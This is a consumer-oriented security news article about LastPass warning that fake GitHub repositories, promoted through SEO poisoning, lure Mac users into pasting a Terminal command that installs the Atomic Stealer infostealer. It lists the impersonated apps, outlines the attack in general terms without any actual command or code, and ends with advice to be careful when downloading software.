LastPass Sounds Alarm on Mac Malware Posing as Open-Source Tools
Mac users are facing a new threat as LastPass reveals a widespread campaign distributing the Atomic Stealer malware. Cybercriminals are using fake GitHub repositories to trick victims into downloading malicious apps disguised as legitimate software and development tools, putting sensitive data at risk.
LastPass is sounding the alarm about a widespread campaign where hackers are using bogus GitHub repositories to spread malware. They're tricking people into downloading malicious programs disguised as legitimate tools.
According to LastPass's Threat Intelligence team, these fake repositories are redirecting victims to download the Atomic infostealer malware. Watch out!
What Apps Are Being Impersonated?
It's not just LastPass! The attackers are mimicking a bunch of popular apps, including:
- 1Password
- Basecamp
- Dropbox
- Gemini
- Hootsuite
- Notion
- Obsidian
- Robinhood
- Salesloft
- SentinelOne
- Shopify
- Thunderbird
- TweetDeck
The goal? To target macOS systems specifically.
How the Attack Works
These hackers are using a technique called Search Engine Optimization (SEO) poisoning. This means they're manipulating search results on Google and Bing to push these malicious GitHub links to the top. If you click on one, you'll be told to download the program by clicking something like "Install LastPass on MacBook," which takes you to a fake GitHub page.
"The GitHub pages appear to be created by multiple GitHub usernames to get around takedowns," LastPass warns. So, even if one gets taken down, they'll pop up again.
That GitHub page then sends you to another domain. There, you'll find instructions (think ClickFix-style instructions) that tell you to copy and paste a command into your Terminal app. Do that, and you'll unleash the Atomic Stealer malware onto your system.
Similar Attacks in the Past
This isn't the first time we've seen this kind of trickery. Remember the malicious sponsored Google Ads for Homebrew? That also used a fake GitHub repository to distribute malware. Security researcher Dhiraj Mishra has a good write-up on that.
And recently, hackers have been using GitHub to host malicious payloads via Amadey, and even employing dangling commits to redirect users to malicious programs.
Stay Vigilant!
The takeaway? Be super careful when downloading software, especially from links in search results. Double-check the source, and if something seems fishy, it probably is.
